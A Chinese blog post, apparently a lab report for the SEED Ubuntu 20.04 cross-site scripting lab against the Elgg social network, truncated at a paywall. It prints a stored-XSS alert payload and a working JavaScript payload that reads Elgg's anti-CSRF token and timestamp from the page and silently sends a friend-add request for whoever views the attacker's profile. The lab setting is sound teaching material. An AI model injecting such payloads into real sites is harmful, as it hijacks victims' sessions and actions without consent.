基于SeedUbuntu20.04跨站脚本攻击(XSS)

最新推荐文章于 2024-05-17 06:41:20 发布
最新推荐文章于 2024-05-17 06:41:20 发布
阅读量2.3k 收藏 11
点赞数 9
分类专栏: 网安实训 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shshuahw/article/details/119538437
版权

XSS攻击和CSRF有类似的地方,但是他比CSRF更难防,也更常见。

CSRF是伪造一个跨站请求,他要先骗别人进入自己精心设计的网站,但是一个不被信任的第三方网站在跳转时,往往站点会贴心地提醒你有被攻击的风险。但是跨站脚本攻击不一样,它可以将代码插入一个被信任的网站的源代码中。

我们经常在逛一些奇怪的网站时发现网页中些弹窗和涩涩的广告,往往就是网站受到了攻击,网页代码中被植入攻击者的恶意代码。这种情况常见于一些被废弃的网站中,被废弃的网站由于缺乏维护,就容易受到攻击。

一.在Elgg里注入Javascript代码

实验小白鼠还是基于专门为未来的黑客们准备的Elgg社交软件,不知道的可以参见我的上一篇博客

跨站请求伪造——CSRF攻击实验报告

1.登录到Samy的账户,进入profile页面

2.点击右上角的Edit HTML,进入HTML文件编辑模式,在“About Me”栏目填入以下内容

<script>alert("XSS");</script>

3.退出

4.登入Alice的账户,进入到“Members”的页面

5.访问Samy的profile,Javascript恶意代码被执行,可以看到XSS的窗口跳出

在这里插入图片描述

二.添加Samy为Alice的好友

1.调查

进入Charlie的账户,添加Samy为好友,使用HTTP header live捕获HTTP数据包,分析其中的字段,获得所需信息

在这里插入图片描述

2.登录Samy的账号,进入Edit profile页面中,进入Edit HTML模式,其中放入以下的Ajax代码

(若不进入该模式,编辑器会向代码中添加格式化数据)

<script type="text/javascript">
window.onload=function()
{
   
    var Ajax=null;//使用Ajax实现Javascript代码,方便在后台发起HTTP请求,防止因Javascript代码发起普通HTTP请求离开当前页面,引起用户怀疑
    
    //设置时间戳和秘密令牌值,使得请求被视为同站请求
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;//将当前页面Javascript代码中的时间戳变量值赋给elgg_ts
    var token="&__elgg_token="+elgg.security.token.__elgg_token;//将当前页面Javascript代码中的秘密令牌变量值赋给elgg_ts
    
    //创建url
    var sendurl="http://www.seed-server.com/action/friends/add"//加好友的网页
    			+"?friend=59" + token + ts;//加上好友ID,token,ts字段构成url
    
    //创建并发送Ajax请求加好友
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.send();
}
</script>
最低0.47元/天 解锁文章
shshuahw
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Seed-labs环境搭建-Ubuntu20.04
空城惜梦的博客
06-19 7171
Seed-labs环境搭建前言一.安装VirtualBox1.下载VirtualBox2.安装二.VDI到VMDK的格式转换1.cmd进入VB的文件夹位置2.重新执行命令等到100%即成功3.若遇上UUID不匹配尝试输入以下命令,修改UUID三.导入虚拟机1.自定义创建虚拟机2.稍后安装操作系统3.设置虚拟机名与存放位置4.使用现有的虚拟磁盘5.导入转换后的VMDK文件6.完成参考: 前言 因为在官方下载的是Ubuntu-20.04.vdi,要用VB打开,但不习惯用VB所以在把文件转换成了VMDK,这里用V
SeedLab-Software:我的SeedLab v2.0 Ubuntu 20.04软件部分的实验报告
04-16
SeedLab软件 我的SeedLab v2.0 Ubuntu 20.04软件部分的实验报告 实验室文档和设置: : 目录 缓冲区溢出攻击实验室(服务器版) 返回libc 环境变量 比赛条件+脏牛 格式字符串 光谱和熔毁
SEED(1)-实验环境搭建_seed-ubuntu20
最新发布
2401_84254343的博客
05-17 568
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
(1)数据包嗅探和欺骗-SEED Ubuntu 20.04
weixin_52521462的博客
10-23 4573
数据包嗅探和欺骗实验
PKI Lab(Public-Key Infrastructure Lab)seed实验Ubuntu20.04
l4kjih3gfe2dcba1的博客
08-09 4933
本实验基于当前最新seed2.0实验,使用Ubuntu2004版本虚机。安装教程略过。
(SEED-LabCross-Site Scripting (XSS) Attack Lab跨站脚本攻击实验
lunan的博客
02-02 5389
(SEED-LabCross-Site Scripting (XSS) Attack Lab 跨站脚本攻击实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 The Elgg Web Application2.2 DNS Confifiguration2.3 Apache Confifiguration3 Lab Tasks3.1 Preparation: Getting Familiar w
SEED LAB】 Cross-Site Scripting (XSS) Attack With SEED Labs - XSS攻击与练习
Jeongon的博客
11-23 839
seed lab XSS攻击的理解与练习
基于Ubuntu20.04编译且可用的fcitx5输入法,版本5.0.16
05-26
fcitx5输入法目前(2022年...不过配置工具基于Qt5.15.2编译,但Ubuntu20.04只能安装5.12.8的Qt Gui组件,所以我把Qt5.15.2的库文件也打包在了DEB里,用户无需再另外安装Qt库。 目录结构 如果有问题可向我反馈,再更新。
Ubuntu 20.04 LTS 配置脚本.zip
02-16
ubuntu
Ubuntu 20.04详细的安装教程.docx
04-11
ubuntu20.04安装教程 Ubuntu 20.04是一款非常流行的开源操作系统,广泛应用于服务器和个人电脑。由于其高度的稳定性和强大的性能,Ubuntu 20.04成为了很多用户的首选。本文将详细介绍Ubuntu 20.04的安装过程,帮助...
ubuntu20.04 tmux.sh 自启动脚本
04-24
ubuntu tmux 自动执行shell脚本,可创建多个session,多个window。多个panes, 平铺所有的panes,对指定session下指定window的指定panes发送指定的多条命令,后台创建! 稍微修改可做成自己的自启动脚本,
ubuntu-16.04.3镜像种子
02-08
ubuntu-16.04.3 镜像种子(ubuntu-16.04.3-desktop-amd64.zip)
ubuntu U盘自动安装autoinstall.seed
01-12
ubuntu U盘自动安装autoinstall.seed
Ubuntu20.04开启root账户的方法步骤
09-14
Ubuntu 20.04操作系统中,默认情况下不推荐使用root账户进行日常操作,而是通过sudo命令以提升权限的方式来执行需要管理员权限的任务。然而,在某些特定场景下,可能需要开启并使用root账户。以下是详细的步骤,...
继苹果之后Ubuntu网站也遭攻击了
xzj111的专栏
07-25 405
收到的邮件内容: Hello, You are receiving this message because you have an account registered with this address onubuntuforums.org. The Ubuntu forums software was compromised by an external attacker. A
ubuntu16.04搭建XSS平台(测试)
幸福诗歌的博客
01-22 1455
使用蓝莲花开源的平台:https://github.com/firesunCN/BlueLotus_XSSReceiver   安装步骤为: 安装http server与php环境(ubuntu:  sudo apt-get install apache2 php7.0 libapache2-mod-php7.0) 上传所有文件至空间根目录:1.使用FTP工具上传到 /var/www/目录下 ...
ubuntu攻击的小邂逅
weixin_38289303的博客
10-11 461
问题描述:         netstat -anl发现有国外ip在不断访问服务器,导致top中有apache进程在短时间内的cpu占用达到3000%多。 解决方法:        1. 查看apache启动用户,top进程监控查看apache的user。        2. 查看服务器的定时任务。           常规方法:                       其他方法...
XSS攻击
大草的博客
07-14 528
恶意用户可能会将JavaScript代码隐藏在其数据中;如果是网路应用程序不会过滤掉代码,代码可能会到达其他用户的浏览器并被执行。这是称为跨站脚本(XSS)。 将数据与代码混合,非常危险。 最佳做法是使用经过广泛审查的过滤器,而不是通过个人的一些快速努力来创建一个。
CSRF的攻击与法防御
Karka_的博客
09-19 129
CSRFTester是一款CSRF漏洞的测试工具。CSRFTester工具的测试原理大概是这样的,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一次伪造客户端请求,如果修测试的请求成功被网站服务器接受,则说明存在CSRF漏洞,当然此款工具也可以被用来进行CSRF攻击。
seedubuntu20.04中的remote attack
12-24
SeedUbuntu20.04中,远程攻击是指通过网络或其他远程方式对系统进行攻击的行为。 首先,SeedUbuntu20.04系统存在的某些弱点可能会被黑客利用,比如一些未经修复的漏洞或者配置不当的网络设置。黑客可以利用这些弱点,通过远程网络渗透到系统内部,以获取敏感信息、控制系统或者破坏系统的正常运行。 其次,SeedUbuntu20.04系统中的远程攻击可能包括网络钓鱼、恶意软件传播、拒绝服务攻击等方式。黑客可以通过发送欺骗性的电子邮件或者创建虚假的网站来诱使用户泄露个人信息或安装恶意软件。此外,黑客也可以利用大规模的请求来攻击系统,导致系统无法正常运行。 为了应对SeedUbuntu20.04系统中的远程攻击,用户可以采取一些安全措施,比如使用防火墙、安装并及时更新杀毒软件、定期备份重要数据等。此外,定期检查系统漏洞、加强用户训练以及加强对远程访问的控制也是防范远程攻击的重要步骤。 总之,在SeedUbuntu20.04系统中远程攻击是需要引起重视的安全问题,用户需要保持警惕并采取相应措施来确保系统的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值